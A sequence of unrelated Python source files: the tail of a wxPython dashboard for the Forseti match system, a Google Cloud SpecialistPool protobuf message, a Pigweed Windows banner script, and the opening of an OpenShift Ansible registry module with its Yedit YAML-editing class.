        self._set_match_panel(match, 0, 0)
        self._set_match_panel(match, 1, 2)
        self._set_match_panel(match, 2, 1)
        self._set_match_panel(match, 3, 3)
        try:
            match.match_number = int(self.match_num_ctrl.GetValue())
        except ValueError:
            match.match_number = random.getrandbits(31)
        return match

    def set_match(self, match):
        self._set_panel_match(match, 0, 0)
        self._set_panel_match(match, 1, 2)
        self._set_panel_match(match, 2, 1)
        self._set_panel_match(match, 3, 3)
        self.match_num_ctrl.SetValue(str(match.match_number))

    def set_time(self, match):
        self.time_text.SetLabel(format_time(match.game_time_so_far))
        self.stage_text.SetLabel(match.stage_name)


class ScheduleControl(wx.Panel):

    def __init__(self, remote, match_control, *args, **kwargs):
        self.remote = remote
        super(ScheduleControl, self).__init__(*args, **kwargs)
        self.InitUI()
        self.remote.match_list_box = self.match_list
        self.match_control = match_control

    def InitUI(self):
        self.match_list = wx.ListBox(self)
        self.match_list.Bind(wx.EVT_LISTBOX, self.choose_match)
        hbox = wx.BoxSizer(wx.HORIZONTAL)
        self.load_button = wx.Button(self, label='Load All')
        self.load_button.Bind(wx.EVT_BUTTON, self.do_load)
        hbox.Add(self.load_button)
        self.clear_first = wx.CheckBox(self, label='Clear first')
        self.clear_first.SetValue(True)
        hbox.Add(self.clear_first)

        vbox = wx.BoxSizer(wx.VERTICAL)
        vbox.Add(self.match_list, 1, wx.EXPAND)
        vbox.Add(hbox)

        self.SetSizer(vbox)
        self.Show(True)

    def do_load(self, e):
        self.remote.do_load(self.clear_first.GetValue())

    def choose_match(self, event):
        self.match_control.set_match(event.GetClientData())


class MainWindow(wx.Frame):

    def __init__(self, remote, *args, **kwargs):
        super(MainWindow, self).__init__(*args, **kwargs) 
        self.remote = remote
        self.InitUI()

    def InitUI(self):    
        menubar = wx.MenuBar()
        fileMenu = wx.Menu()
        fitem = fileMenu.Append(wx.ID_EXIT, 'Quit', 'Quit application')
        menubar.Append(fileMenu, '&File')
        self.SetMenuBar(menubar)

        match_control = MatchControl(self.remote, self)
        schedule_control = ScheduleControl(self.remote, match_control, self)
        self.remote.match_control = match_control
        vbox = wx.BoxSizer(wx.VERTICAL)
        vbox.Add(match_control, 0, wx.ALIGN_CENTER | wx.ALIGN_TOP, 8)
        vbox.Add(schedule_control, 1, wx.EXPAND | wx.ALIGN_CENTER | wx.ALL, 8)

        self.Bind(wx.EVT_MENU, self.OnQuit, fitem)

        self.SetSize((800, 600))
        self.SetSizer(vbox)
        self.SetTitle('Forseti Dashboard')
        self.Centre()
        self.Show(True)

    def OnQuit(self, e):
        self.Close()

def format_match(match):
    print(match.match_number)
    print(match.team_names)
    print(match.team_numbers)
    return '{}: {} ({}) & {} ({}) vs. {} ({}) & {} ({})'.format(
        match.match_number, 
        match.team_names[0], match.team_numbers[0],
        match.team_names[1], match.team_numbers[1],
        match.team_names[2], match.team_numbers[2],
        match.team_names[3], match.team_numbers[3],
        )

class Remote(object):

    def __init__(self):
        self.lc = lcm.LCM('udpm://239.255.76.67:7667?ttl=1')
        self.lc.subscribe('Schedule/Schedule', self.handle_schedule)
        self.lc.subscribe('Timer/Time', self.handle_time)
        self.match_list_box = None
        self.match_control = None
        self.thread = threading.Thread(target=self._loop)
        self.thread.daemon = True

    def start(self):
        self.thread.start()

    def _loop(self):
        while True:
            try:
                self.lc.handle()
            except Exception as ex:
                print('Got exception while handling lcm message', ex)

    def handle_schedule(self, channel, data):
        msg = Forseti.Schedule.decode(data)
        for i in range(msg.num_matches):
            self.match_list_box.Insert(format_match(msg.matches[i]), i,
                    msg.matches[i])

    def handle_time(self, channel, data):
        msg = Forseti.Time.decode(data)
        #wx.CallAfter(self.time_text.SetLabel, format_time(msg.game_time_so_far))
        wx.CallAfter(self.match_control.set_time, msg)

    def do_load(self, clear_first):
        if clear_first:
            self.match_list_box.Clear()
        msg = Forseti.ScheduleLoadCommand()
        msg.clear_first = clear_first
        print('Requesting load')
        self.lc.publish('Schedule/Load', msg.encode())

    def do_save(self, match):
        self.lc.publish('Match/Save', match.encode())

    def do_init(self, match):
        self.lc.publish('Match/Init', match.encode())

    def do_time_ctrl(self, command):
        msg = Forseti.TimeControl()
        msg.command_name = command
        self.lc.publish('Timer/Control', msg.encode())

    def do_go(self):
        self.do_time_ctrl('start')

    def do_pause(self):
        self.do_time_ctrl('pause')

def format_time(seconds):
    return '{}:{:02}'.format(seconds // 60,
                             seconds % 60)


def main():
    
    app = wx.App()
    remote = Remote()
    MainWindow(remote, None)
    remote.start()
    remote.do_load(False)
    app.MainLoop()    


if __name__ == '__main__':
    main()

# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto  # type: ignore


__protobuf__ = proto.module(
    package="google.cloud.aiplatform.v1", manifest={"SpecialistPool",},
)


class SpecialistPool(proto.Message):
    r"""SpecialistPool represents customers' own workforce to work on
    their data labeling jobs. It includes a group of specialist
    managers and workers. Managers are responsible for managing the
    workers in this pool as well as customers' data labeling jobs
    associated with this pool. Customers create specialist pool as
    well as start data labeling jobs on Cloud, managers and workers
    handle the jobs using CrowdCompute console.

    Attributes:
        name (str):
            Required. The resource name of the
            SpecialistPool.
        display_name (str):
            Required. The user-defined name of the
            SpecialistPool. The name can be up to 128
            characters long and can be consist of any UTF-8
            characters.
            This field should be unique on project-level.
        specialist_managers_count (int):
            Output only. The number of managers in this
            SpecialistPool.
        specialist_manager_emails (Sequence[str]):
            The email addresses of the managers in the
            SpecialistPool.
        pending_data_labeling_jobs (Sequence[str]):
            Output only. The resource name of the pending
            data labeling jobs.
        specialist_worker_emails (Sequence[str]):
            The email addresses of workers in the
            SpecialistPool.
    """

    name = proto.Field(proto.STRING, number=1,)
    display_name = proto.Field(proto.STRING, number=2,)
    specialist_managers_count = proto.Field(proto.INT32, number=3,)
    specialist_manager_emails = proto.RepeatedField(proto.STRING, number=4,)
    pending_data_labeling_jobs = proto.RepeatedField(proto.STRING, number=5,)
    specialist_worker_emails = proto.RepeatedField(proto.STRING, number=7,)


__all__ = tuple(sorted(__protobuf__.manifest))

# -*- coding: utf-8 -*-

# Copyright 2020 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Prints the env_setup banner for cmd.exe.

This is done from Python as activating colors and printing ASCII art are not
easy to do in cmd.exe. Activated colors also don't persist in the parent
process.
"""

from __future__ import print_function

import argparse
import os
import sys

from .colors import Color, enable_colors  # type: ignore

_PIGWEED_BANNER = u'''
 ▒█████▄   █▓  ▄███▒  ▒█    ▒█ ░▓████▒ ░▓████▒ ▒▓████▄
  ▒█░  █░ ░█▒ ██▒ ▀█▒ ▒█░ █ ▒█  ▒█   ▀  ▒█   ▀  ▒█  ▀█▌
  ▒█▄▄▄█░ ░█▒ █▓░ ▄▄░ ▒█░ █ ▒█  ▒███    ▒███    ░█   █▌
  ▒█▀     ░█░ ▓█   █▓ ░█░ █ ▒█  ▒█   ▄  ▒█   ▄  ░█  ▄█▌
  ▒█      ░█░ ░▓███▀   ▒█▓▀▓█░ ░▓████▒ ░▓████▒ ▒▓████▀
'''


def print_banner(bootstrap, no_shell_file):
    """Print the Pigweed or project-specific banner"""
    enable_colors()

    print(Color.green('\n  WELCOME TO...'))
    print(Color.magenta(_PIGWEED_BANNER))

    if bootstrap:
        print(
            Color.green('\n  BOOTSTRAP! Bootstrap may take a few minutes; '
                        'please be patient'))
        print(
            Color.green(
                '  On Windows, this stage is extremely slow (~10 minutes).\n'))
    else:
        print(
            Color.green(
                '\n  ACTIVATOR! This sets your console environment variables.\n'
            ))

        if no_shell_file:
            print(Color.bold_red('Error!\n'))
            print(
                Color.red('  Your Pigweed environment does not seem to be'
                          ' configured.'))
            print(Color.red('  Run bootstrap.bat to perform initial setup.'))

    return 0


def parse():
    """Parse command-line arguments."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--bootstrap', action='store_true')
    parser.add_argument('--no-shell-file', action='store_true')
    return parser.parse_args()


def main():
    """Script entry point."""
    if os.name != 'nt':
        return 1
    return print_banner(**vars(parse()))


if __name__ == '__main__':
    sys.exit(main())

#!/usr/bin/env python
# pylint: disable=missing-docstring
# flake8: noqa: T001
#     ___ ___ _  _ ___ ___    _ _____ ___ ___
#    / __| __| \| | __| _ \  /_\_   _| __|   \
#   | (_ | _|| .` | _||   / / _ \| | | _|| |) |
#    \___|___|_|\_|___|_|_\/_/_\_\_|_|___|___/_ _____
#   |   \ / _ \  | \| |/ _ \_   _| | __|   \_ _|_   _|
#   | |) | (_) | | .` | (_) || |   | _|| |) | |  | |
#   |___/ \___/  |_|\_|\___/ |_|   |___|___/___| |_|
#
# Copyright 2016 Red Hat, Inc. and/or its affiliates
# and other contributors as indicated by the @author tags.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

# -*- -*- -*- Begin included fragment: lib/import.py -*- -*- -*-
'''
   OpenShiftCLI class that wraps the oc commands in a subprocess
'''
# pylint: disable=too-many-lines

from __future__ import print_function
import atexit
import copy
import json
import os
import re
import shutil
import subprocess
import tempfile
# pylint: disable=import-error
try:
    import ruamel.yaml as yaml
except ImportError:
    import yaml

from ansible.module_utils.basic import AnsibleModule

# -*- -*- -*- End included fragment: lib/import.py -*- -*- -*-

# -*- -*- -*- Begin included fragment: doc/registry -*- -*- -*-

DOCUMENTATION = '''
---
module: oc_adm_registry
short_description: Module to manage openshift registry
description:
  - Manage openshift registry programmatically.
options:
  state:
    description:
    - The desired action when managing openshift registry
    - present - update or create the registry
    - absent - tear down the registry service and deploymentconfig
    - list - returns the current representiation of a registry
    required: false
    default: False
    aliases: []
  kubeconfig:
    description:
    - The path for the kubeconfig file to use for authentication
    required: false
    default: /etc/origin/master/admin.kubeconfig
    aliases: []
  debug:
    description:
    - Turn on debug output.
    required: false
    default: False
    aliases: []
  name:
    description:
    - The name of the registry
    required: false
    default: None
    aliases: []
  namespace:
    description:
    - The selector when filtering on node labels
    required: false
    default: None
    aliases: []
  images:
    description:
    - The image to base this registry on - ${component} will be replaced with --type
    required: 'openshift3/ose-${component}:${version}'
    default: None
    aliases: []
  latest_images:
    description:
    - If true, attempt to use the latest image for the registry instead of the latest release.
    required: false
    default: False
    aliases: []
  labels:
    description:
    - A set of labels to uniquely identify the registry and its components.
    required: false
    default: None
    aliases: []
  enforce_quota:
    description:
    - If set, the registry will refuse to write blobs if they exceed quota limits
    required: False
    default: False
    aliases: []
  mount_host:
    description:
    - If set, the registry volume will be created as a host-mount at this path.
    required: False
    default: False
    aliases: []
  ports:
    description:
    - A comma delimited list of ports or port pairs to expose on the registry pod.  The default is set for 5000.
    required: False
    default: [5000]
    aliases: []
  replicas:
    description:
    - The replication factor of the registry; commonly 2 when high availability is desired.
    required: False
    default: 1
    aliases: []
  selector:
    description:
    - Selector used to filter nodes on deployment. Used to run registries on a specific set of nodes.
    required: False
    default: None
    aliases: []
  service_account:
    description:
    - Name of the service account to use to run the registry pod.
    required: False
    default: 'registry'
    aliases: []
  tls_certificate:
    description:
    - An optional path to a PEM encoded certificate (which may contain the private key) for serving over TLS
    required: false
    default: None
    aliases: []
  tls_key:
    description:
    - An optional path to a PEM encoded private key for serving over TLS
    required: false
    default: None
    aliases: []
  volume_mounts:
    description:
    - The volume mounts for the registry.
    required: false
    default: None
    aliases: []
  daemonset:
    description:
    - Use a daemonset instead of a deployment config.
    required: false
    default: False
    aliases: []
  edits:
    description:
    - A list of modifications to make on the deploymentconfig
    required: false
    default: None
    aliases: []
  env_vars:
    description:
    - A dictionary of modifications to make on the deploymentconfig. e.g. FOO: BAR
    required: false
    default: None
    aliases: []
  force:
    description:
    - Force a registry update.
    required: false
    default: False
    aliases: []
author:
- "Kenny Woodson <kwoodson@redhat.com>"
extends_documentation_fragment: []
'''

EXAMPLES = '''
- name: create a secure registry
  oc_adm_registry:
    name: docker-registry
    service_account: registry
    replicas: 2
    namespace: default
    selector: type=infra
    images: "registry.ops.openshift.com/openshift3/ose-${component}:${version}"
    env_vars:
      REGISTRY_CONFIGURATION_PATH: /etc/registryconfig/config.yml
      REGISTRY_HTTP_TLS_CERTIFICATE: /etc/secrets/registry.crt
      REGISTRY_HTTP_TLS_KEY: /etc/secrets/registry.key
      REGISTRY_HTTP_SECRET: supersecret
    volume_mounts:
    - path: /etc/secrets
      name: dockercerts
      type: secret
      secret_name: registry-secret
    - path: /etc/registryconfig
      name: dockersecrets
      type: secret
      secret_name: docker-registry-config
    edits:
    - key: spec.template.spec.containers[0].livenessProbe.httpGet.scheme
      value: HTTPS
      action: put
    - key: spec.template.spec.containers[0].readinessProbe.httpGet.scheme
      value: HTTPS
      action: put
    - key: spec.strategy.rollingParams
      value:
        intervalSeconds: 1
        maxSurge: 50%
        maxUnavailable: 50%
        timeoutSeconds: 600
        updatePeriodSeconds: 1
      action: put
    - key: spec.template.spec.containers[0].resources.limits.memory
      value: 2G
      action: update
    - key: spec.template.spec.containers[0].resources.requests.memory
      value: 1G
      action: update

  register: registryout

'''

# -*- -*- -*- End included fragment: doc/registry -*- -*- -*-

# -*- -*- -*- Begin included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-


class YeditException(Exception):  # pragma: no cover
    ''' Exception class for Yedit '''
    pass


# pylint: disable=too-many-public-methods
class Yedit(object):  # pragma: no cover
    ''' Class to modify yaml files '''
    re_valid_key = r"(((\[-?\d+\])|([0-9a-zA-Z%s/_-]+)).?)+$"
    re_key = r"(?:\[(-?\d+)\])|([0-9a-zA-Z{}/_-]+)"
    com_sep = set(['.', '#', '|', ':'])

    # pylint: disable=too-many-arguments
    def __init__(self,
                 filename=None,
                 content=None,
                 content_type='yaml',
                 separator='.',
                 backup=False):
        self.content = content
        self._separator = separator
        self.filename = filename
        self.__yaml_dict = content
        self.content_type = content_type
        self.backup = backup
        self.load(content_type=self.content_type)
        if self.__yaml_dict is None:
            self.__yaml_dict = {}

    @property
    def separator(self):
        ''' getter method for separator '''
        return self._separator

    @separator.setter
    def separator(self, inc_sep):
        ''' setter method for separator '''
        self._separator = inc_sep

    @property
    def yaml_dict(self):
        ''' getter method for yaml_dict '''
        return self.__yaml_dict

    @yaml_dict.setter
    def yaml_dict(self, value):
        ''' setter method for yaml_dict '''
        self.__yaml_dict = value

    @staticmethod
    def parse_key(key, sep='.'):
        '''parse the key allowing the appropriate separator'''
        common_separators = list(Yedit.com_sep - set([sep]))
        return re.findall(Yedit.re_key.format(''.join(common_separators)), key)

    @staticmethod
    def valid_key(key, sep='.'):
        '''validate the incoming key'''
        common_separators = list(Yedit.com_sep - set([sep]))
        if not re.match(Yedit.re_valid_key.format(''.join(common_separators)), key):
            return False

        return True

    @staticmethod
    def remove_entry(data, key, sep='.'):
        ''' remove data at location key '''
        if key == '' and isinstance(data, dict):
            data.clear()
            return True
        elif key == '' and isinstance(data, list):
            del data[:]
            return True

        if not (key and Yedit.valid_key(key, sep)) and \
           isinstance(data, (list, dict)):
            return None

        key_indexes = Yedit.parse_key(key, sep)
        for arr_ind, dict_key in key_indexes[:-1]:
            if dict_key and isinstance(data, dict):
                data = data.get(dict_key)
            elif (arr_ind and isinstance(data, list) and
                  int(arr_ind) <= len(data) - 1):
                data = data[int(arr_ind)]
            else:
                return None

        # process last index for remove
        # expected list entry
        if key_indexes[-1][0]:
            if isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1:  # noqa: E501
                del data[int(key_indexes[-1][0])]
                return True

        # expected dict entry
        elif key_indexes[-1][1]:
            if isinstance(data, dict):
                del data[key_indexes[-1][1]]
                return True

    @staticmethod
    def add_entry(data, key, item=None, sep='.'):
        ''' Get an item from a dictionary with key notation a.b.c
            d = {'a': {'b': 'c'}}}
            key = a#b
            return c
        '''
        if key == '':
            pass
        elif (not (key and Yedit.valid_key(key, sep)) and
              isinstance(data, (list, dict))):
            return None

        key_indexes = Yedit.parse_key(key, sep)
        for arr_ind, dict_key in key_indexes[:-1]:
            if dict_key:
                if isinstance(data, dict) and dict_key in data and data[dict_key]:  # noqa: E501
                    data = data[dict_key]
                    continue

                elif data and not isinstance(data, dict):
                    raise YeditException("Unexpected item type found while going through key " +
                                         "path: {} (at key: {})".format(key, dict_key))

                data[dict_key] = {}
                data = data[dict_key]

            elif (arr_ind and isinstance(data, list) and
                  int(arr_ind) <= len(data) - 1):
                data = data[int(arr_ind)]
            else:
                raise YeditException("Unexpected item type found while going through key path: {}".format(key))

        if key == '':
            data = item

        # process last index for add
        # expected list entry
        elif key_indexes[-1][0] and isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1:  # noqa: E501
            data[int(key_indexes[-1][0])] = item

        # expected dict entry
        elif key_indexes[-1][1] and isinstance(data, dict):
            data[key_indexes[-1][1]] = item

        # didn't add/update to an existing list, nor add/update key to a dict
        # so we must have been provided some syntax like a.b.c[<int>] = "data" for a
        # non-existent array
        else:
            raise YeditException("Error adding to object at path: {}".format(key))

        return data

    @staticmethod
    def get_entry(data, key, sep='.'):
        ''' Get an item from a dictionary with key notation a.b.c
            d = {'a': {'b': 'c'}}}
            key = a.b
            return c
        '''
        if key == '':
            pass
        elif (not (key and Yedit.valid_key(key, sep)) and
              isinstance(data, (list, dict))):
            return None

        key_indexes = Yedit.parse_key(key, sep)
        for arr_ind, dict_key in key_indexes:
            if dict_key and isinstance(data, dict):
                data = data.get(dict_key)
            elif (arr_ind and isinstance(data, list) and
                  int(arr_ind) <= len(data) - 1):
                data = data[int(arr_ind)]
            else:
                return None

        return data

    @staticmethod
    def _write(filename, contents):
        ''' Actually write the file contents to disk. This helps with mocking. '''

        tmp_filename = filename + '.yedit'

        with open(tmp_filename, 'w') as yfd:
            yfd.write(contents)

        os.rename(tmp_filename, filename)

    def write(self):
        ''' write to file '''
        if not self.filename:
            raise YeditException('Please specify a filename.')

        if self.backup and self.file_exists():
            shutil.copy(self.filename, self.filename + '.orig')

        # Try to set format attributes if supported
        try:
            self.yaml_dict.fa.set_block_style()
        except AttributeError:
            pass

        # Try to use RoundTripDumper if supported.
        try:
            Yedit._write(self.filename, yaml.dump(self.yaml_dict, Dumper=yaml.RoundTripDumper))
        except AttributeError:
            Yedit._write(self.filename, yaml.safe_dump(self.yaml_dict, default_flow_style=False))

        return (True, self.yaml_dict)

    def read(self):
        ''' read from file '''
        # check if it exists
        if self.filename is None or not self.file_exists():
            return None

        contents = None
        with open(self.filename) as yfd:
            contents = yfd.read()

        return contents

    def file_exists(self):
        ''' return whether file exists '''
        if os.path.exists(self.filename):
            return True

        return False

    def load(self, content_type='yaml'):
        ''' return yaml file '''
        contents = self.read()

        if not contents and not self.content:
            return None

        if self.content:
            if isinstance(self.content, dict):
                self.yaml_dict = self.content
                return self.yaml_dict
            elif isinstance(self.content, str):
                contents = self.content

        # check if it is yaml
        try:
            if content_type == 'yaml' and contents:
                # Try to set format attributes if supported
                try:
                    self.yaml_dict.fa.set_block_style()
                except AttributeError:
                    pass

                # Try to use RoundTripLoader if supported.
                try:
                    self.yaml_dict = yaml.safe_load(contents, yaml.RoundTripLoader)
                except AttributeError:
                    self.yaml_dict = yaml.safe_load(contents)

                # Try to set format attributes if supported
                try:
                    self.yaml_dict.fa.set_block_style()
                except AttributeError:
                    pass

            elif content_type == 'json' and contents:
                self.yaml_dict = json.loads(contents)
        except yaml.YAMLError as err:
            # Error loading yaml or json
            raise YeditException('Problem with loading yaml file. {}'.format(err))

        return self.yaml_dict

    def get(self, key):
        ''' get a specified key'''
        try:
            entry = Yedit.get_entry(self.yaml_dict, key, self.separator)
        except KeyError:
            entry = None

        return entry

    def pop(self, path, key_or_item):
        ''' remove a key, value pair from a dict or an item for a list'''
        try:
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        except KeyError:
            entry = None

        if entry is None:
            return (False, self.yaml_dict)

        if isinstance(entry, dict):
            # AUDIT:maybe-no-member makes sense due to fuzzy types
            # pylint: disable=maybe-no-member
            if key_or_item in entry:
                entry.pop(key_or_item)
                return (True, self.yaml_dict)
            return (False, self.yaml_dict)

        elif isinstance(entry, list):
            # AUDIT:maybe-no-member makes sense due to fuzzy types
            # pylint: disable=maybe-no-member
            ind = None
            try:
                ind = entry.index(key_or_item)
            except ValueError:
                return (False, self.yaml_dict)

            entry.pop(ind)
            return (True, self.yaml_dict)

        return (False, self.yaml_dict)

    def delete(self, path):
        ''' remove path from a dict'''
        try:
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        except KeyError:
            entry = None

        if entry is None:
            return (False, self.yaml_dict)

        result = Yedit.remove_entry(self.yaml_dict, path, self.separator)
        if not result:
            return (False, self.yaml_dict)

        return (True, self.yaml_dict)

    def exists(self, path, value):
        ''' check if value exists at path'''
        try:
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        except KeyError:
            entry = None

        if isinstance(entry, list):
            if value in entry:
                return True
            return False

        elif isinstance(entry, dict):
            if isinstance(value, dict):
                rval = False
                for key, val in value.items():
                    if entry[key] != val:
                        rval = False
                        break
                else:
                    rval = True
                return rval

            return value in entry

        return entry == value

    def append(self, path, value):
        '''append value to a list'''
        try:
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        except KeyError:
            entry = None

        if entry is None:
            self.put(path, [])
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        if not isinstance(entry, list):
            return (False, self.yaml_dict)

        # AUDIT:maybe-no-member makes sense due to loading data from
        # a serialized format.
        # pylint: disable=maybe-no-member
        entry.append(value)
        return (True, self.yaml_dict)

    # pylint: disable=too-many-arguments
    def update(self, path, value, index=None, curr_value=None):
        ''' put path, value into a dict '''
        try:
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        except KeyError:
            entry = None

        if isinstance(entry, dict):
            # AUDIT:maybe-no-member makes sense due to fuzzy types
            # pylint: disable=maybe-no-member
            if not isinstance(value, dict):
                raise YeditException('Cannot replace key, value entry in dict with non-dict type. ' +
                                     'value=[{}] type=[{}]'.format(value, type(value)))

            entry.update(value)
            return (True, self.yaml_dict)

        elif isinstance(entry, list):
            # AUDIT:maybe-no-member makes sense due to fuzzy types
            # pylint: disable=maybe-no-member
            ind = None
            if curr_value:
                try:
                    ind = entry.index(curr_value)
                except ValueError:
                    return (False, self.yaml_dict)

            elif index is not None:
                ind = index

            if ind is not None and entry[ind] != value:
                entry[ind] = value
                return (True, self.yaml_dict)

            # see if it exists in the list
            try:
                ind = entry.index(value)
            except ValueError:
                # doesn't exist, append it
                entry.append(value)
                return (True, self.yaml_dict)

            # already exists, return
            if ind is not None:
                return (False, self.yaml_dict)
        return (False, self.yaml_dict)

    def put(self, path, value):
        ''' put path, value into a dict '''
        try:
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        except KeyError:
            entry = None

        if entry == value:
            return (False, self.yaml_dict)

        # deepcopy didn't work
        # Try to use ruamel.yaml and fallback to pyyaml
        try:
            tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict,
                                                      default_flow_style=False),
                                 yaml.RoundTripLoader)
        except AttributeError:
            tmp_copy = copy.deepcopy(self.yaml_dict)

        # set the format attributes if available
        try:
            tmp_copy.fa.set_block_style()
        except AttributeError:
            pass

        result = Yedit.add_entry(tmp_copy, path, value, self.separator)
        if result is None:
            return (False, self.yaml_dict)

        # When path equals "" it is a special case.
        # "" refers to the root of the document
        # Only update the root path (entire document) when its a list or dict
        if path == '':
            if isinstance(result, list) or isinstance(result, dict):
                self.yaml_dict = result
                return (True, self.yaml_dict)

            return (False, self.yaml_dict)

        self.yaml_dict = tmp_copy

        return (True, self.yaml_dict)

    def create(self, path, value):
        ''' create a yaml file '''
        if not self.file_exists():
            # deepcopy didn't work
            # Try to use ruamel.yaml and fallback to pyyaml
            try:
                tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict,
                                                          default_flow_style=False),
                                     yaml.RoundTripLoader)
            except AttributeError:
                tmp_copy = copy.deepcopy(self.yaml_dict)

            # set the format attributes if available
            try:
                tmp_copy.fa.set_block_style()
            except AttributeError:
                pass

            result = Yedit.add_entry(tmp_copy, path, value, self.separator)
            if result is not None:
                self.yaml_dict = tmp_copy
                return (True, self.yaml_dict)

        return (False, self.yaml_dict)

    @staticmethod
    def get_curr_value(invalue, val_type):
        '''return the current value'''
        if invalue is None:
            return None

        curr_value = invalue
        if val_type == 'yaml':
            curr_value = yaml.load(invalue)
        elif val_type == 'json':
            curr_value = json.loads(invalue)

        return curr_value

    @staticmethod
    def parse_value(inc_value, vtype=''):
        '''determine value type passed'''
        true_bools = ['y', 'Y', 'yes', 'Yes', 'YES', 'true', 'True', 'TRUE',
                      'on', 'On', 'ON', ]
        false_bools = ['n', 'N', 'no', 'No', 'NO', 'false', 'False', 'FALSE',
                       'off', 'Off', 'OFF']

        # It came in as a string but you didn't specify value_type as string
        # we will convert to bool if it matches any of the above cases
        if isinstance(inc_value, str) and 'bool' in vtype:
            if inc_value not in true_bools and inc_value not in false_bools:
                raise YeditException('Not a boolean type. str=[{}] vtype=[{}]'.format(inc_value, vtype))
        elif isinstance(inc_value, bool) and 'str' in vtype:
            inc_value = str(inc_value)

        # There is a special case where '' will turn into None after yaml loading it so skip
        if isinstance(inc_value, str) and inc_value == '':
            pass
        # If vtype is not str then go ahead and attempt to yaml load it.
        elif isinstance(inc_value, str) and 'str' not in vtype:
            try:
                inc_value = yaml.safe_load(inc_value)
            except Exception:
                raise YeditException('Could not determine type of incoming value. ' +
                                     'value=[{}] vtype=[{}]'.format(type(inc_value), vtype))

        return inc_value

    @staticmethod
    def process_edits(edits, yamlfile):
        '''run through a list of edits and process them one-by-one'''
        results = []
        for edit in edits:
            value = Yedit.parse_value(edit['value'], edit.get('value_type', ''))
            if edit.get('action') == 'update':
                # pylint: disable=line-too-long
                curr_value = Yedit.get_curr_value(
                    Yedit.parse_value(edit.get('curr_value')),
                    edit.get('curr_value_format'))

                rval = yamlfile.update(edit['key'],
                                       value,
                                       edit.get('index'),
                                       curr_value)

            elif edit.get('action') == 'append':
                rval = yamlfile.append(edit['key'], value)

            else:
                rval = yamlfile.put(edit['key'], value)

            if rval[0]:
                results.append({'key': edit['key'], 'edit': rval[1]})

        return {'changed': len(results) > 0, 'results': results}

    # pylint: disable=too-many-return-statements,too-many-branches
    @staticmethod
    def run_ansible(params):
        '''perform the idempotent crud operations'''
        yamlfile = Yedit(filename=params['src'],
                         backup=params['backup'],
                         separator=params['separator'])

        state = params['state']

        if params['src']:
            rval = yamlfile.load()

            if yamlfile.yaml_dict is None and state != 'present':
                return {'failed': True,
                        'msg': 'Error opening file [{}].  Verify that the '.format(params['src']) +
                               'file exists, that it is has correct permissions, and is valid yaml.'}

        if state == 'list':
            if params['content']:
                content = Yedit.parse_value(params['content'], params['content_type'])
                yamlfile.yaml_dict = content

            if params['key']:
                rval = yamlfile.get(params['key']) or {}

            return {'changed': False, 'result': rval, 'state': state}

        elif state == 'absent':
            if params['content']:
                content = Yedit.parse_value(params['content'], params['content_type'])
                yamlfile.yaml_dict = content

            if params['update']:
                rval = yamlfile.pop(params['key'], params['value'])
            else:
                rval = yamlfile.delete(params['key'])

            if rval[0] and params['src']:
                yamlfile.write()

            return {'changed': rval[0], 'result': rval[1], 'state': state}

        elif state == 'present':
            # check if content is different than what is in the file
            if params['content']:
                content = Yedit.parse_value(params['content'], params['content_type'])

                # We had no edits to make and the contents are the same
                if yamlfile.yaml_dict == content and \
                   params['value'] is None:
                    return {'changed': False, 'result': yamlfile.yaml_dict, 'state': state}

                yamlfile.yaml_dict = content

            # If we were passed a key, value then
            # we enapsulate it in a list and process it
            # Key, Value passed to the module : Converted to Edits list #
            edits = []
            _edit = {}
            if params['value'] is not None:
                _edit['value'] = params['value']
                _edit['value_type'] = params['value_type']
                _edit['key'] = params['key']

                if params['update']:
                    _edit['action'] = 'update'
                    _edit['curr_value'] = params['curr_value']
                    _edit['curr_value_format'] = params['curr_value_format']
                    _edit['index'] = params['index']

                elif params['append']:
                    _edit['action'] = 'append'

                edits.append(_edit)

            elif params['edits'] is not None:
                edits = params['edits']

            if edits:
                results = Yedit.process_edits(edits, yamlfile)

                # if there were changes and a src provided to us we need to write
                if results['changed'] and params['src']:
                    yamlfile.write()

                return {'changed': results['changed'], 'result': results['results'], 'state': state}

            # no edits to make
            if params['src']:
                # pylint: disable=redefined-variable-type
                rval = yamlfile.write()
                return {'changed': rval[0],
                        'result': rval[1],
                        'state': state}

            # We were passed content but no src, key or value, or edits.  Return contents in memory
            return {'changed': False, 'result': yamlfile.yaml_dict, 'state': state}
        return {'failed': True, 'msg': 'Unkown state passed'}

# -*- -*- -*- End included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-

# -*- -*- -*- Begin included fragment: lib/base.py -*- -*- -*-
# pylint: disable=too-many-lines
# noqa: E301,E302,E303,T001


